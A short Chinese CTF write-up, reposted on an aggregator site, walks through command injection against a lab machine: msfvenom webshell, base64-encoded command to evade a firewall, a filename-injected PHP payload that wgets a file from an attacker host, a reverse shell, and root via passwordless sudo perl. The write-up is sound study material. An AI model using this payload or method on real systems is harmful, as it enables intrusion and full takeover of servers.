首页 > Web开发 > 详细

CTF--HTTP服务--命令注入2

时间:2020-02-05 18:45:32      阅读:68      评论:0      收藏:0      [点我收藏+]

开门见山


 

1. 启动metasploit

 技术分享图片

 

 

2. 设置参数参数选项

 技术分享图片

 

 

3. 查看最后设置后的结果

 技术分享图片

 

 

4. 启动监听

 技术分享图片

 

 

5. 使用msfvemon制作webshell

 技术分享图片

 

 技术分享图片

 

6. 开启apache服务

 技术分享图片

 

 

7. 使用bash64对命令进行加密,为此绕过防火墙

 技术分享图片

 

 

8. 通过burpsuite抓包改包上传,把文件名改为命令执行

<?php system(base64_decode(‘d2dldCBodHRwOi8vMTkyLjE2OC4zMS45NC9zIC1PIC90bXAvYQo=‘));die();?>.php

 技术分享图片

 

 技术分享图片

 

 技术分享图片

 

 

9. 监听端收到反馈

 技术分享图片

 

 

10. 查看靶机信息

 技术分享图片

 

 

11. 通过shell查看靶机登陆用户的权限

 技术分享图片

 

 

12. 查看sudo的权限内容,发现一个/usr/bin/perl不需要密码,提升为root权限

 技术分享图片

 

 

13. 查找flag文件,并查看它

 技术分享图片

 

 技术分享图片

 

 

 


 

CTF--HTTP服务--命令注入2

原文:https://www.cnblogs.com/joker-vip/p/12264714.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!